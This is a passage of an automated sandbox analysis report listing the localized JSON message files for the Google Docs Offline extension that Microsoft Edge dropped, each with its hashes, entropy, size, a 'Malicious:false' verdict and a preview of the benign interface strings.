                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                  Encrypted:false
